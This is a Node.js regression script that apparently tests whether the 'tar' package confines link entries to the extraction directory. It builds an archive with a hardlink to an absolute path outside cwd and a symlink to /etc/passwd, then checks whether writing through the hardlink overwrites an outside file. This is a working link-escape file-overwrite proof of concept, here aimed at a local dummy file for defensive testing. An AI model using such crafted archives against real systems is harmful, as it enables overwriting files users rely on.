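// Regression check for tar link-escape handling.
//
// Builds an archive containing (1) a hardlink entry whose linkpath is an
// absolute path outside the extraction directory and (2) a symlink entry
// targeting an absolute system path, extracts it with `preservePaths: false`,
// and then checks whether a write through the extracted hardlink reaches the
// file outside `cwd`. On a correctly hardened extractor the run ends in the
// "[-] Failed ... (Patched?)" branch or in the extraction rejection handler;
// the "[!] VULNERABLE" line means the confinement to `cwd` was bypassed.
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const OUT_DIR = path.resolve('out_repro');    // extraction cwd; every entry must stay inside it
const SECRET = path.resolve('secret.txt');    // file outside OUT_DIR that must remain unchanged
const TAR_FILE = path.resolve('exploit.tar');
const TARGET_SYM = '/etc/passwd';             // symlink target; this script never reads or writes it

// Cleanup & Setup. Best-effort on purpose: `force: true` and the existsSync
// guard already tolerate missing paths, so the catch only covers permission
// problems, and a stale state should not abort the check.
try {
  fs.rmSync(OUT_DIR, { recursive: true, force: true });
  if (fs.existsSync(SECRET)) fs.unlinkSync(SECRET);
} catch (e) {}
fs.mkdirSync(OUT_DIR, { recursive: true });
fs.writeFileSync(SECRET, 'ORIGINAL_DATA');
console.log(`[+] Target: ${SECRET}`);

// Payload 1: hardlink whose linkpath is absolute (outside OUT_DIR).
const h1 = new tar.Header({ path: 'exploit_hard', type: 'Link', size: 0, linkpath: SECRET });
h1.encode();

// Payload 2: symlink to an absolute system path. Note that the verification
// below only exercises the hardlink; the symlink entry is extracted but its
// outcome is not checked.
const h2 = new tar.Header({ path: 'exploit_sym', type: 'SymbolicLink', size: 0, linkpath: TARGET_SYM });
h2.encode();

// Generate archive: the two encoded header blocks followed by 1024 zero bytes
// as the end-of-archive marker.
const data = Buffer.concat([h1.block, h2.block, Buffer.alloc(1024)]);
fs.writeFileSync(TAR_FILE, data);
console.log(`[+] Created malicious archive: ${TAR_FILE}`);

// Trigger extraction. `preservePaths: false` is the setting under test: it is
// what should keep link targets confined to `cwd`.
console.log('[*] Extracting...');
tar.x({ cwd: OUT_DIR, file: TAR_FILE, preservePaths: false })
  .then(() => {
    // Verification: writing through the extracted link must not alter SECRET.
    try {
      const linkPath = path.join(OUT_DIR, 'exploit_hard');
      fs.writeFileSync(linkPath, 'VULN_CONFIRMED');
      if (fs.readFileSync(SECRET, 'utf8') === 'VULN_CONFIRMED') {
        console.log('[!] VULNERABLE: Arbitrary file overwrite successful.');
      } else {
        console.log('[-] Failed: File not overwritten (Patched?).');
      }
    } catch (e) {
      console.log('[-] Error during verification:', e.message);
    }
  })
  .catch((e) => {
    // A rejected extraction previously surfaced only as an unhandled promise
    // rejection; report it explicitly so the outcome of the check is visible.
    console.log('[-] Extraction rejected:', e.message);
  });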